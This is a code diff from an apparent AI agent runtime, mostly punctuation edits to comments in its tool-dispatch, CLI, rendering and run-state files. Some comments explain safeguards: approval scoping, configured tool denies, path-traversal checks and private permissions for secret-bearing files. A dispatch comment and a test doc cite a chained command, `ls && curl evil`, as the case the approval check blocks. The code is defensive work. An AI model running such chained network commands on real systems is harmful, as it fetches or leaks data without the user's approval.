 //! to the built-in and MCP executors, applying the same policy / approval /
-//! interaction flow the imperative worker used — but with interactions routed
+//! interaction flow the imperative worker used - but with interactions routed
 //! through the in-memory [`leviath_runtime::interaction_hub`] instead of file
 //! polling.
 //!
@@ -10,7 +10,7 @@
 //! handled by [`dispatch_dynamic_interaction`]. File-tracking result rewriting is
 //! deliberately *not* done here: this executor is ECS-free (no context window),
 //! so the shared world's `collect_tools` applies the agent's `file_tracking`
-//! config to these results downstream — where the window is available — via the
+//! config to these results downstream - where the window is available - via the
 //! same path top-level agents use. Every daemon agent, sub-agent included, gets
 //! file-tracking whenever its blueprint declares it.
 
@@ -50,7 +50,7 @@ pub struct AgentToolState {
     pub launch_overrides: Arc<HashMap<String, ToolPolicy>>,
     /// Tools the user allowed for the whole run (grows on "allow for session").
     pub session_allows: Arc<Mutex<HashSet<String>>>,
-    /// The current stage's `tool_permissions` — re-synced by `sync_stage` on each
+    /// The current stage's `tool_permissions` - re-synced by `sync_stage` on each
     /// stage change (a `std` mutex so the sync system can update it synchronously).
     pub stage_perms: Arc<StdMutex<HashMap<String, String>>>,
     /// Every stage's `tool_permissions`, indexed by stage index; `sync_stage`
@@ -91,7 +91,7 @@ pub struct AgentToolState {
     pub dynamic: Option<Arc<DynamicToolCtx>>,
 }
 
-/// Re-resolution inputs for a `dynamic_tools` agent — held so [`CliToolService`]
+/// Re-resolution inputs for a `dynamic_tools` agent - held so [`CliToolService`]
 /// can re-scan its `tools/` directories and re-filter its stage tool defs mid-run.
 pub struct DynamicToolCtx {
     /// `tools/` directories to re-scan (agent dir, run workdir, global), in order.
@@ -118,7 +118,7 @@ async fn execute_tool(state: &AgentToolState, is_builtin: bool, tc: &ToolCall) -
     // before it. They used to take an early return in `dispatch_tools` that
     // skipped `resolve_policy` entirely: no approval prompt was ever raised for
     // them, and a user's `[tool_permissions] spawn_agent = "deny"` was silently
-    // ignored — the "a configured deny is terminal" guarantee simply did not
+    // ignored - the "a configured deny is terminal" guarantee simply did not
     // cover these five names. That mattered because `spawn_agent` runs a whole
     // second agent, with that manifest's own command seeds and MCP servers.
     if crate::daemon::subagent::is_subagent_tool(&tc.name) {
@@ -179,7 +179,7 @@ async fn execute_script_tool(state: &AgentToolState, tc: &ToolCall) -> String {
         .get(&tc.name)
         .cloned()
     else {
-        // Name was in `script_tool_names` but the tool is gone — treat as unknown.
+        // Name was in `script_tool_names` but the tool is gone - treat as unknown.
         return format!("[error] unknown script tool: {}", tc.name);
     };
     let host = state.script_host.clone();
@@ -193,7 +193,7 @@ async fn execute_script_tool(state: &AgentToolState, tc: &ToolCall) -> String {
 /// own native-function guards, or a task cancelled by runtime shutdown, becomes
 /// a tool error rather than taking the daemon (and every other run) with it.
 ///
-/// A free function applied via `unwrap_or_else` — not a `match` arm — because
+/// A free function applied via `unwrap_or_else` - not a `match` arm - because
 /// the arm can no longer be reached from a test now that panics are contained
 /// inside `leviath_scripting` (issue #109), while this body is directly
 /// unit-testable with a real `JoinError`. Mirrors
@@ -206,12 +206,12 @@ fn script_tool_join_failed(e: tokio::task::JoinError) -> String {
 /// of tool calls, returning `(tool_call_id, result)` pairs in call order.
 ///
 /// Two passes so tool calls within one batch run in parallel where it is safe:
-/// 1. **Sequential resolution** — dynamic interactions (`ask_user_*`), sub-agent
+/// 1. **Sequential resolution** - dynamic interactions (`ask_user_*`), sub-agent
 ///    tools, and `ask` approval prompts are inherently interactive and are
 ///    resolved one at a time, in order (a user answers one prompt at a time, and
 ///    a `Session`-scope approval must be visible to later calls in the batch).
 ///    Each call ends up either fully resolved or queued for execution.
-/// 2. **Parallel execution** — every queued call runs concurrently (`join_all`),
+/// 2. **Parallel execution** - every queued call runs concurrently (`join_all`),
 ///    then results are stitched back into the original call order.
 pub async fn dispatch_tools(
     state: Arc<AgentToolState>,
@@ -229,8 +229,8 @@ pub async fn dispatch_tools(
     let mut queued: Vec<(usize, bool, ToolCall)> = Vec::new();
     for tc in calls {
         let slot = slots.len();
-        // ask_user_* / present_for_review are handled by the interaction backend
-        // — the hub (a real person answers) or, for an unattended `--yolo` run,
+        // ask_user_* / present_for_review are handled by the interaction backend -
+        // the hub (a real person answers) or, for an unattended `--yolo` run,
         // the auto-answering one.
         let interaction: &dyn InteractionBackend = match state.unattended {
             true => &UnattendedInteraction,
@@ -247,13 +247,13 @@ pub async fn dispatch_tools(
         let is_builtin = state.builtin_names.contains(&tc.name);
         // What a session-scoped approval for *this specific call* would be
         // remembered under. For a shell call that is one key per command in the
-        // line, not the bare tool name — see `session_approval_keys`.
+        // line, not the bare tool name - see `session_approval_keys`.
         let approval_keys = crate::tools::session_approval_keys(&tc.name, &tc.arguments);
         let session_approved = match approval_keys.is_empty() {
             // A call with no reusable key can never match an earlier grant.
             true => false,
             // Every command in the line must already be granted. One ungranted
-            // program is enough to ask again — that is what stops a grant for
+            // program is enough to ask again - that is what stops a grant for
             // `ls` from covering `ls && curl evil`.
             false => {
                 let allows = state.session_allows.lock().await;
@@ -296,7 +296,7 @@ pub async fn dispatch_tools(
                 if response.approved.unwrap_or(false) {
                     // Record a grant for each command the user just saw run. An
                     // empty key list means this call is not reusable, so "for
-                    // this session" degrades to "this once" — the safe direction.
+                    // this session" degrades to "this once" - the safe direction.
                     if response.scope == Some(ApprovalScope::Session) && !approval_keys.is_empty() {
                         let mut allows = state.session_allows.lock().await;
                         for key in &approval_keys {
@@ -734,7 +734,7 @@ mod tests {
     fn a_poisoned_state_map_does_not_wedge_every_other_agent() {
         // `states` holds *every* agent's tool state. A panic while holding it
         // used to poison it, so from then on `.lock().unwrap()` panicked for all
-        // agents — one bad agent taking the whole daemon's tool dispatch with it
+        // agents - one bad agent taking the whole daemon's tool dispatch with it
         // (issue #109). Recovering the guard keeps the map usable.
         let svc = CliToolService::new();
         let e = Entity::from_raw_u32(1).expect("a small literal index is always a valid entity id");
@@ -864,7 +864,7 @@ mod tests {
         .await;
         assert!(dirty.load(Ordering::SeqCst));
         // A non-write builtin (list_dir, default Allow) exercises the
-        // `writes == false` short-circuit — no flag.
+        // `writes == false` short-circuit - no flag.
         dirty.store(false, Ordering::SeqCst);
         dispatch_tools(
             state,
@@ -1302,7 +1302,7 @@ mod tests {
     /// H2: a session grant is scoped to what was approved. Approving `ls` must
     /// not carry over to a command that merely *starts* with `ls` and then
     /// chains something else. A chained line is now split into one key per
-    /// command it runs, and *every* one has to be granted — so `curl` and `sh`,
+    /// command it runs, and *every* one has to be granted - so `curl` and `sh`,
     /// which the user never approved, send it back to the policy.
     #[tokio::test]
     async fn a_session_grant_does_not_carry_to_a_chained_command() {
@@ -1449,7 +1449,7 @@ mod tests {
     async fn subagent_tool_with_a_handle_is_routed_to_the_handler() {
         let hub = InteractionHub::new();
         // A handle whose host is already gone: routing succeeds but the send
-        // fails, so the handler reports "shutting down" — which proves the call
+        // fails, so the handler reports "shutting down" - which proves the call
         // reached `subagent::handle` (the Some branch), not the None fallback.
         // Drop the receiver explicitly (a `_rx` binding would outlive the send
         // and hang the handler on the never-answered oneshot reply).
@@ -1545,7 +1545,7 @@ mod tests {
     async fn unattended_run_answers_ask_user_itself_instead_of_opening_a_prompt() {
         // `--yolo` sets `unattended`, so `ask_user_confirm` resolves inline. With
         // a live hub and nobody answering, the attended path would block here
-        // forever — this test finishing at all is the assertion (#107).
+        // forever - this test finishing at all is the assertion (#107).
         let hub = InteractionHub::new();
         let mut state =
             (*state_with(&hub, leviath_mcp::ToolExecutor::new(), HashMap::new())).clone();
@@ -1623,7 +1623,7 @@ for line in sys.stdin:
 
     /// Returns a tool *execution* error. The error flag's wire name is
     /// `isError`; this stub previously wrote `is_error`, which only worked
-    /// because the client read the same wrong name — so the pair agreed and
+    /// because the client read the same wrong name - so the pair agreed and
     /// the bug stayed invisible here while every real server's tool errors
     /// were being reported to the model as successes.
     const MCP_STUB_ERROR: &str = r#"

--- a/crates/leviath-cli/src/dispatch.rs
+++ b/crates/leviath-cli/src/dispatch.rs
@@ -3,11 +3,11 @@
 //!
 //! This lives in the library crate (not `main.rs`) so its routing logic can be
 //! unit-tested under `cargo llvm-cov`'s `--lib` scope. The subcommands whose
-//! real execution performs I/O a unit test must never trigger — a real
+//! real execution performs I/O a unit test must never trigger - a real
 //! terminal takeover (`dash`), blocking stdin (`setup` interactive,
 //! foreground `run`), binding a real port (`serve`), spawning a detached
-//! worker or running a real inference loop (`run` background / `__run-worker`)
-//! — are routed through the [`RiskyExecutors`] trait rather than called
+//! worker or running a real inference loop (`run` background / `__run-worker`) -
+//! are routed through the [`RiskyExecutors`] trait rather than called
 //! directly. That way:
 //!
 //! * unit tests drive `dispatch()`'s full routing match against a
@@ -105,35 +105,35 @@ pub enum Commands {
 /// (static dispatch, no `dyn`), so no boxing or `Send` bound is required.
 #[allow(async_fn_in_trait)]
 pub trait RiskyExecutors {
-    /// `lev run` — auto-starts the daemon (real process spawn) if needed and
+    /// `lev run` - auto-starts the daemon (real process spawn) if needed and
     /// spawns the agent into the shared world over the control socket.
     async fn run(&self, args: commands::run::RunArgs) -> anyhow::Result<()>;
-    /// `lev ps` — resolves the control-socket path and queries the daemon.
+    /// `lev ps` - resolves the control-socket path and queries the daemon.
     async fn ps(&self, args: commands::ps::PsArgs) -> anyhow::Result<()>;
-    /// `lev msg` — resolves the control-socket path and sends a message.
+    /// `lev msg` - resolves the control-socket path and sends a message.
     async fn msg(&self, args: commands::ctl::MsgArgs) -> anyhow::Result<()>;
-    /// `lev cancel` — resolves the control-socket path and cancels a run.
+    /// `lev cancel` - resolves the control-socket path and cancels a run.
     async fn cancel(&self, args: commands::ctl::CancelArgs) -> anyhow::Result<()>;
-    /// `lev respond` — resolves the control-socket path and answers/lists interactions.
+    /// `lev respond` - resolves the control-socket path and answers/lists interactions.
     async fn respond(&self, args: commands::ctl::RespondArgs) -> anyhow::Result<()>;
-    /// `lev setup` — interactive (blocking stdin) or `--non-interactive`.
+    /// `lev setup` - interactive (blocking stdin) or `--non-interactive`.
     async fn setup(&self, args: commands::setup::SetupArgs) -> anyhow::Result<()>;
-    /// `lev dash` — takes over the real terminal and blocks on real keyboard input.
+    /// `lev dash` - takes over the real terminal and blocks on real keyboard input.
     async fn dashboard(&self, args: commands::dashboard::DashboardArgs) -> anyhow::Result<()>;
-    /// `lev serve` — binds a real port and serves indefinitely.
+    /// `lev serve` - binds a real port and serves indefinitely.
     async fn serve(&self, args: commands::serve::ServeArgs) -> anyhow::Result<()>;
-    /// `lev agent-client` — takes over real stdin/stdout to speak the Agent
+    /// `lev agent-client` - takes over real stdin/stdout to speak the Agent
     /// Client Protocol against the shared-world daemon.
     async fn agent_client(
         &self,
         args: commands::agent_client::AgentClientArgs,
     ) -> anyhow::Result<()>;
-    /// `lev daemon` — binds the control socket and serves the shared world.
+    /// `lev daemon` - binds the control socket and serves the shared world.
     async fn daemon(&self, args: commands::daemon::DaemonArgs) -> anyhow::Result<()>;
-    /// `lev mcp` — rewrites config, opens a browser for OAuth, touches the token store.
+    /// `lev mcp` - rewrites config, opens a browser for OAuth, touches the token store.
     async fn mcp(&self, args: commands::mcp::McpArgs) -> anyhow::Result<()>;
 
-    /// `lev auth` — reads the config file and may write the OS credential store.
+    /// `lev auth` - reads the config file and may write the OS credential store.
     async fn auth(&self, args: commands::auth::AuthArgs) -> anyhow::Result<()>;
 }
 

--- a/crates/leviath-cli/src/lib.rs
+++ b/crates/leviath-cli/src/lib.rs
@@ -1,4 +1,4 @@
-//! Leviath CLI library — re-exports for integration tests.
+//! Leviath CLI library - re-exports for integration tests.
 
 pub mod bundled;
 pub mod commands;

--- a/crates/leviath-cli/src/main.rs
+++ b/crates/leviath-cli/src/main.rs
@@ -3,9 +3,9 @@
 //! This binary is deliberately thin: it is the *composition root* where real
 //! I/O is constructed and wired into the library's already-tested command
 //! cores. `cargo xtask coverage` measures `--lib` only, never `--bin`, so the
-//! genuinely un-unit-testable slivers below — taking over the real terminal
+//! genuinely un-unit-testable slivers below - taking over the real terminal
 //! (`lev dash`), reading real stdin (`lev setup` interactive), and delegating
-//! to the library's real command entrypoints — live here rather than behind a
+//! to the library's real command entrypoints - live here rather than behind a
 //! `#[cfg(not(test))]` coverage escape hatch in library code.
 
 use std::fs::File;
@@ -107,7 +107,7 @@ impl RiskyExecutors for RealExecutors {
         &self,
         args: commands::agent_client::AgentClientArgs,
     ) -> anyhow::Result<()> {
-        // Like `serve`, this is a client of the shared-world daemon — ensure it's
+        // Like `serve`, this is a client of the shared-world daemon - ensure it's
         // running, then speak the Agent Client Protocol over real stdio, routing
         // agent actions through its control socket. The protocol loop
         // (`agent_client::serve_over`) is fully unit-tested over an in-memory
@@ -178,7 +178,7 @@ impl RiskyExecutors for RealExecutors {
 
 /// Real `lev run`: ensure the daemon is running (auto-start it detached if not),
 /// then resolve the blueprint + task and spawn the agent into the shared world.
-/// Wiring only — the request-building + daemon exchange (`daemon::client`) are
+/// Wiring only - the request-building + daemon exchange (`daemon::client`) are
 /// unit-tested; the cwd/home resolution, process spawn, and socket connect are
 /// the un-unit-testable slivers kept here.
 async fn real_run(args: commands::run::RunArgs) -> anyhow::Result<()> {
@@ -222,7 +222,7 @@ async fn ensure_daemon_running() -> anyhow::Result<()> {
             return Ok(()); // already running the current build
         }
         // A daemon from an older build is running. It cannot pick up new code, so
-        // restart it cleanly — it reloads its persisted agents on startup, so
+        // restart it cleanly - it reloads its persisted agents on startup, so
         // in-flight runs survive the swap.
         eprintln!("leviath daemon is on an older build; restarting to load {CURRENT_BUILD}…");
         // Shut down quietly (straight over the control socket) rather than via
@@ -274,7 +274,7 @@ async fn real_daemon_stop() -> anyhow::Result<()> {
         return Ok(());
     }
     // Ask politely first. If the control channel refuses or is wedged, fall back
-    // to signalling the recorded process — otherwise a daemon that cannot be
+    // to signalling the recorded process - otherwise a daemon that cannot be
     // talked to cannot be stopped either, and `lev daemon restart` (which stops
     // before it starts) could never recover.
     if let Err(e) = commands::daemon::send_shutdown(&control_client()?).await {
@@ -324,15 +324,15 @@ async fn real_daemon_status() -> anyhow::Result<()> {
     Ok(())
 }
 
-/// `lev daemon restart`: stop the running daemon (if any), then start a fresh one
-/// — which reloads persisted agents on startup.
+/// `lev daemon restart`: stop the running daemon (if any), then start a fresh one -
+/// which reloads persisted agents on startup.
 async fn real_daemon_restart() -> anyhow::Result<()> {
     real_daemon_stop().await?;
     real_daemon_start().await
 }
 
-/// Resolve the platform's service definition for this installation. Wiring only
-/// — the rendering, paths, and command lines are the tested
+/// Resolve the platform's service definition for this installation. Wiring only -
+/// the rendering, paths, and command lines are the tested
 /// `commands::daemon_service` core; this supplies the real exe path, home
 /// directory, and uid.
 fn resolve_service_unit() -> anyhow::Result<commands::daemon_service::ServiceUnit> {
@@ -351,7 +351,7 @@ fn resolve_service_unit() -> anyhow::Result<commands::daemon_service::ServiceUni
 }
 
 /// Run a supervisor command (`launchctl` / `systemctl`), reporting its stderr on
-/// failure. The real subprocess spawn — the argv it runs is built and tested in
+/// failure. The real subprocess spawn - the argv it runs is built and tested in
 /// `commands::daemon_service`.
 fn run_supervisor(cmd: &(String, Vec<String>)) -> anyhow::Result<()> {
     let out = std::process::Command::new(&cmd.0).args(&cmd.1).output()?;
@@ -395,7 +395,7 @@ fn real_daemon_uninstall() -> anyhow::Result<()> {
 }
 
 /// Real `lev daemon`: bind the platform control socket and drive the shared world
-/// until Ctrl-C. Wiring only — the world, host, tool service, and spawner it
+/// until Ctrl-C. Wiring only - the world, host, tool service, and spawner it
 /// composes (`daemon::setup`) plus the control transport (`control_socket`:
 /// bind/accept/handle) are all unit-tested. Only the real accept loop + signal
 /// I/O are the un-unit-testable slivers kept here in the (coverage-unmeasured)
@@ -477,7 +477,7 @@ fn control_client() -> anyhow::Result<leviath_runtime::control_socket::ControlCl
 
 /// Real `lev dash`: supplies the real crossterm terminal backend and event
 /// source to the library's fully-tested `dashboard::execute_with`. Wiring
-/// only — the loop, rendering, input handling, and engine setup it composes
+/// only - the loop, rendering, input handling, and engine setup it composes
 /// are all exercised under `cargo test`.
 async fn real_dashboard(_args: DashboardArgs) -> anyhow::Result<()> {
     // The dashboard is a client of the shared-world daemon: ensure it's running,
@@ -495,8 +495,8 @@ async fn real_dashboard(_args: DashboardArgs) -> anyhow::Result<()> {
 /// then fall back to writing the OSC52 escape sequence to the real controlling
 /// terminal / stdout. The native-tool + fallback branch logic is unit-tested in
 /// `yank_to_clipboard_via`; `leviath_sys::osc52_write_via`'s branches are
-/// unit-tested via injected fakes. The two real-I/O leaves it composes here —
-/// opening `/dev/tty` and acquiring `stdout()` — are the un-unit-testable slivers.
+/// unit-tested via injected fakes. The two real-I/O leaves it composes here -
+/// opening `/dev/tty` and acquiring `stdout()` - are the un-unit-testable slivers.
 fn real_yank(text: &str) -> bool {
     commands::dashboard::yank_to_clipboard_via(text, |t| {
         let mut out = io::stdout();
@@ -519,7 +519,7 @@ fn open_controlling_tty() -> io::Result<File> {
 
 /// Real `lev setup`: the real config paths, the real environment, a real
 /// browser for the "open the signup page" key, a real TTY check, and the real
-/// network-backed provider verifier — everything the library's tested
+/// network-backed provider verifier - everything the library's tested
 /// `execute_with` takes as a seam.
 ///
 /// The verification task is spawned here rather than inside `execute_with`

--- a/crates/leviath-cli/src/render.rs
+++ b/crates/leviath-cli/src/render.rs
@@ -25,9 +25,9 @@ use ratatui::{
 
 // ─── Palette ──────────────────────────────────────────────────────────────────
 //
-// Shared with every other Leviath terminal surface. This file used to carry its
-// own hand-copied duplicate of the dashboard's palette, which is exactly the
-// kind of thing that drifts.
+// Shared with every other Leviath terminal surface. Imported from the single
+// definition in `tui::theme` rather than a hand-copied duplicate of the
+// dashboard's palette, which is exactly the kind of thing that drifts.
 
 use crate::tui::theme::{C_ACCENT, C_CODE_BG, C_DIM, C_MUTED, C_SUCCESS, C_WHITE};
 

--- a/crates/leviath-cli/src/render.rs
+++ b/crates/leviath-cli/src/render.rs
@@ -14,7 +14,7 @@
 //! - `mermaid` fenced blocks → styled fallback box with a hint to install mmdc
 //! - Horizontal rules (dim dashes)
 //!
-//! Plain text that contains no markdown degrades cleanly — it just renders as
+//! Plain text that contains no markdown degrades cleanly - it just renders as
 //! white text.
 
 use pulldown_cmark::{CodeBlockKind, Event, HeadingLevel, Options, Parser, Tag, TagEnd};
@@ -205,7 +205,7 @@ impl Renderer {
                     Style::default().fg(C_ACCENT).add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("mermaid diagram", Style::default().fg(C_ACCENT)),
-                Span::styled(" — source", Style::default().fg(C_DIM)),
+                Span::styled(" - source", Style::default().fg(C_DIM)),
             ]));
             for code_line in &content {
                 self.push_line(Line::from(vec![
@@ -262,7 +262,7 @@ impl Renderer {
                     if !self.lines.is_empty() {
                         self.blank_line();
                     }
-                    // Visual decorators — convey depth without # text (terminal can't vary font size)
+                    // Visual decorators - convey depth without # text (terminal can't vary font size)
                     let (color, prefix, bold) = match level {
                         HeadingLevel::H1 => (C_ACCENT, "▌ ", true),
                         HeadingLevel::H2 => (C_ACCENT, "▎ ", true),
@@ -488,7 +488,7 @@ mod tests {
     fn push_line_flushes_pending_spans_first() {
         // No current caller ever invokes `push_line` while `current_spans`
         // is non-empty (each call site flushes its own pending spans via a
-        // separate check first) -- but the method itself is directly
+        // separate check first) - but the method itself is directly
         // testable by constructing that state manually, without needing a
         // real caller to reach it.
         let mut r = Renderer::new(80);
@@ -822,7 +822,7 @@ mod tests {
 
     #[test]
     fn bold_italic_nested_inherits_both_modifiers() {
-        // ***text*** parses as Strong containing Emphasis (or vice versa) —
+        // ***text*** parses as Strong containing Emphasis (or vice versa) -
         // the inner style must inherit the outer's bold/italic/strikethrough.
         let md = "***bold italic***";
         let text = markdown_to_text(md, 80);
@@ -1011,7 +1011,7 @@ mod tests {
     #[test]
     fn rule_directly_inside_blockquote_flushes_pending_quote_marker_span() {
         // `Start(BlockQuote)` pushes the "│ " marker into `current_spans`,
-        // then `Event::Rule` fires with nothing else queued -- exercises the
+        // then `Event::Rule` fires with nothing else queued - exercises the
         // `!self.current_spans.is_empty()` flush at `Event::Rule` (every
         // other rule test has an empty `current_spans` at that point).
         let md = "> ---";
@@ -1022,7 +1022,7 @@ mod tests {
     #[test]
     fn empty_blockquote_flushes_pending_quote_marker_span_at_end() {
         // `Start(BlockQuote)` pushes "│ " with no inner content at all
-        // before `End(BlockQuote)` -- exercises the flush at blockquote end
+        // before `End(BlockQuote)` - exercises the flush at blockquote end
         // (every other blockquote test has real paragraph content, which
         // flushes `current_spans` via `End(Paragraph)` first).
         let md = ">";
@@ -1038,7 +1038,7 @@ mod tests {
     #[test]
     fn nested_strong_inside_strikethrough_inherits_strikethrough_modifier() {
         // `push_inline` for the inner `Strong` tag inherits `strikethrough`
-        // from the `Strikethrough` parent already on the stack -- every
+        // from the `Strikethrough` parent already on the stack - every
         // other strikethrough test only nests plain text, never another
         // inline tag, so `parent.strikethrough` was never true at push time.
         let md = "~~strike **bold inside** more~~";

--- a/crates/leviath-cli/src/runstate.rs
+++ b/crates/leviath-cli/src/runstate.rs
@@ -1,15 +1,15 @@
 //! On-disk run state for background agent executions.
 //!
 //! Each run lives under `~/.leviath/runs/<run-id>/` with:
-//! - `meta.json`    — run metadata, updated atomically (tmp + rename)
-//! - `output.log`  — append-only combined worker stdout (legacy/fallback)
-//! - `stages.json` — index of per-stage records
-//! - `stages/<idx>/output.log` — readable agent output for that stage
-//! - `stages/<idx>/logs.log`   — operational events + tool activity
-//! - `stages/<idx>/context.json` — context snapshot for that stage
+//! - `meta.json`    - run metadata, updated atomically (tmp + rename)
+//! - `output.log`  - append-only combined worker stdout (legacy/fallback)
+//! - `stages.json` - index of per-stage records
+//! - `stages/<idx>/output.log` - readable agent output for that stage
+//! - `stages/<idx>/logs.log`   - operational events + tool activity
+//! - `stages/<idx>/context.json` - context snapshot for that stage
 //!
 //! The dashboard's activity log is persisted separately at:
-//! - `~/.leviath/dashboard.log` — never cleared, appended across sessions
+//! - `~/.leviath/dashboard.log` - never cleared, appended across sessions
 
 use std::path::{Path, PathBuf};
 use std::time::{SystemTime, UNIX_EPOCH};
@@ -32,15 +32,15 @@ pub fn write_context_snapshot(run_id: &str, snap: &ContextSnapshot) -> anyhow::R
 /// sibling + rename).
 ///
 /// Non-generic (takes an already-serialized string) so it has a single
-/// monomorphization and every region — including the `std::fs` error `?`
-/// arms — is exercised by real tests. Serialization is performed by the
+/// monomorphization and every region - including the `std::fs` error `?`
+/// arms - is exercised by real tests. Serialization is performed by the
 /// callers, whose concrete production types
 /// (`ContextSnapshot`/`RunMeta`/`&[StageRecord]`) are provably infallible to
 /// serialize (see the `.expect` sites).
 fn write_json_atomic(path: &std::path::Path, json: &str) -> anyhow::Result<()> {
     let tmp = path.with_extension("json.tmp");
     // `write_private`: these files carry the run's full task prompt,
-    // conversation and tool output — and `meta.json` carries the webhook
+    // conversation and tool output - and `meta.json` carries the webhook
     // signing secret. They were written with a plain `fs::write` at the umask
     // default (typically 0644), protected only by the 0700 on the enclosing run
     // directory. That is one `chmod` away from being readable, and defence in
@@ -114,7 +114,7 @@ pub fn runs_dir() -> PathBuf {
 /// Directory for a specific run.
 ///
 /// A `run_id` that is not a single safe path component resolves to
-/// `<runs_dir>/<invalid>`, a name that cannot exist — so a caller that passes an
+/// `<runs_dir>/<invalid>`, a name that cannot exist - so a caller that passes an
 /// attacker-supplied id gets a miss rather than a traversal. `run_id` reaches
 /// this from URL segments on `GET /api/agents/{id}/logs` and friends, where
 /// `Path::join` would otherwise happily accept `../../` or an absolute path.
@@ -146,7 +146,7 @@ fn dashboard_log_path_from(env_override: Option<&str>) -> PathBuf {
 ///
 /// Honours the `LEVIATH_DASHBOARD_LOG_PATH` override when set (tests use it via
 /// `isolate_runs_dir_for_test`); otherwise resolves the real home-relative
-/// path. This function only *computes* a `PathBuf` — it never writes — so both
+/// path. This function only *computes* a `PathBuf` - it never writes - so both
 /// arms are safe to exercise directly in tests. The write side
 /// ([`append_dashboard_log`] and `Dashboard::add_log`) is what must stay off
 /// the user's real log in tests: `append_dashboard_log`'s own tests set the
@@ -161,13 +161,13 @@ pub fn dashboard_log_path() -> PathBuf {
 }
 
 /// Append a timestamped line to the persistent dashboard activity log at the
-/// default [`dashboard_log_path`]. Silently ignores I/O errors — best-effort.
+/// default [`dashboard_log_path`]. Silently ignores I/O errors - best-effort.
 pub fn append_dashboard_log(msg: &str) {
     append_dashboard_log_to(&dashboard_log_path(), msg);
 }
 
 /// Append a timestamped line to the dashboard activity log at an explicit
-/// `path`. Silently ignores I/O errors — the dashboard log is best-effort.
+/// `path`. Silently ignores I/O errors - the dashboard log is best-effort.
 ///
 /// The path is a parameter so `Dashboard` can inject a test-isolated log
 /// location, guaranteeing no dashboard-input test appends to the user's real
@@ -209,7 +209,7 @@ fn rolled_log_path(path: &Path) -> PathBuf {
 
 /// Roll the live log to `<name>.1` once it reaches `max_bytes`, replacing any
 /// existing rolled file, so the live file restarts empty and at most one
-/// previous generation is retained (bounded ~2×cap on disk). Best-effort — a
+/// previous generation is retained (bounded ~2×cap on disk). Best-effort - a
 /// failed rename just leaves the log to keep growing rather than erroring.
 fn roll_log_if_over_cap(path: &Path, max_bytes: u64) {
     let over = std::fs::metadata(path)
@@ -233,7 +233,7 @@ const RUN_ID_ENTROPY_BITS: u32 = 48;
 /// a `lev run --count N` batch inside one process but degenerated to a pure
 /// function of the current second across separate processes: three concurrent
 /// `lev run` invocations all minted `fetcher-1785127214-8b48` and silently shared
-/// one run directory. Nothing downstream detects that — `create_dir_all` is a
+/// one run directory. Nothing downstream detects that - `create_dir_all` is a
 /// no-op on an existing directory and the persistence worker then last-writer-wins
 /// over `meta.json` / `context.json` / `run.lvr`, interleaving two runs'
 /// state irrecoverably.
@@ -256,7 +256,7 @@ pub fn create_run(meta: &RunMeta) -> anyhow::Result<()> {
 /// Create an explicit run directory and write initial metadata into it.
 ///
 /// Callers that already know the directory should prefer this over
-/// [`create_run`], which resolves it from the home directory — the daemon's
+/// [`create_run`], which resolves it from the home directory - the daemon's
 /// spawner stakes out the run dir under its own configured `runs_dir`.
 pub(crate) fn create_run_in(dir: &std::path::Path, meta: &RunMeta) -> anyhow::Result<()> {
     std::fs::create_dir_all(dir)?;
@@ -275,7 +275,7 @@ pub fn write_meta(meta: &RunMeta) -> anyhow::Result<()> {
 /// Atomically write `meta.json` into an explicit run directory.
 ///
 /// Callers that already know the directory should prefer this over
-/// [`write_meta`], which resolves it from the home directory — the daemon's
+/// [`write_meta`], which resolves it from the home directory - the daemon's
 /// recovery pass works from its configured `runs_dir` instead.
 pub(crate) fn write_meta_to(dir: &std::path::Path, meta: &RunMeta) -> anyhow::Result<()> {
     let json =
@@ -315,7 +315,7 @@ pub enum ForceCancelOutcome {
 }
 
 impl ForceCancelOutcome {
-    /// Whether the id named a run at all — i.e. whether the cancel had a target,
+    /// Whether the id named a run at all - i.e. whether the cancel had a target,
     /// regardless of whether it needed to write anything.
     pub fn found_run(&self) -> bool {
         !matches!(self, Self::NoSuchRun)
@@ -438,7 +438,7 @@ pub fn tail_file(path: &std::path::Path, max_bytes: u64) -> String {
         Err(_) => return String::new(),
     };
 
-    // Use fstat on the open fd rather than a separate stat() call — avoids the
+    // Use fstat on the open fd rather than a separate stat() call - avoids the
     // TOCTOU window between existence check and metadata read. Falls back to 0
     // (read everything) if fstat somehow fails on an already-open fd.
     let file_size = file.metadata().map(|m| m.len()).unwrap_or(0);
@@ -959,7 +959,7 @@ mod tests {
         assert_eq!(ids.len(), 100);
     }
 
-    /// Split `<name>-<secs>-<hex>` from the right — the agent name itself may
+    /// Split `<name>-<secs>-<hex>` from the right - the agent name itself may
     /// contain dashes.
     fn split_run_id(id: &str) -> (&str, &str) {
         let mut parts = id.rsplitn(3, '-');
@@ -995,7 +995,7 @@ mod tests {
             largest = largest.max(suffixes.len());
         }
         // 200 calls take microseconds, so they cannot all land in distinct
-        // seconds — without this the assertion above would be vacuous.
+        // seconds - without this the assertion above would be vacuous.
         assert!(
             largest > 1,
             "expected IDs sharing a second, got {by_second:?}"
@@ -1007,7 +1007,7 @@ mod tests {
     #[test]
     fn write_and_read_meta_roundtrip() {
         // Isolated via `isolate_runs_dir_for_test` so write_meta/read_meta
-        // never touch the real ~/.leviath/runs/ -- the temp dir is removed
+        // never touch the real ~/.leviath/runs/ - the temp dir is removed
         // automatically when `_guard` drops, so no manual cleanup needed.
         with_isolated_runs_dir("write-and-read-meta-roundtrip", |_d| {
             let meta = RunMeta::new(
@@ -1236,7 +1236,7 @@ mod tests {
     fn append_dashboard_log_open_failure_is_silently_ignored() {
         // Covers the `if let Ok(mut file) = ... .open(&path)` pattern *not*
         // matching: pre-create the resolved log path as a directory, so
-        // opening it for append fails with `IsADirectory` -- the function
+        // opening it for append fails with `IsADirectory` - the function
         // must swallow this silently (best-effort logging) rather than
         // panic.
         with_isolated_runs_dir("append-dashboard-log-open-failure", |_d| {
@@ -1302,7 +1302,7 @@ mod tests {
     #[test]
     fn dashboard_log_path_structure() {
         // Exercises the real (env-reading) `dashboard_log_path()` on its
-        // fallback branch, so -- like `runs_dir_structure` below -- it forces
+        // fallback branch, so - like `runs_dir_structure` below - it forces
         // `LEVIATH_DASHBOARD_LOG_PATH` unset via `temp_env::with_var_unset`,
         // which also serializes against every other temp-env test so a
         // concurrently-isolated test can't race this assertion.
@@ -1337,7 +1337,7 @@ mod tests {
 
     #[test]
     fn runs_dir_structure() {
-        // See the comment on `dashboard_log_path_structure` above -- same
+        // See the comment on `dashboard_log_path_structure` above - same
         // race, same fix, for `LEVIATH_RUNS_DIR`.
         temp_env::with_var_unset("LEVIATH_RUNS_DIR", || {
             let path = runs_dir();
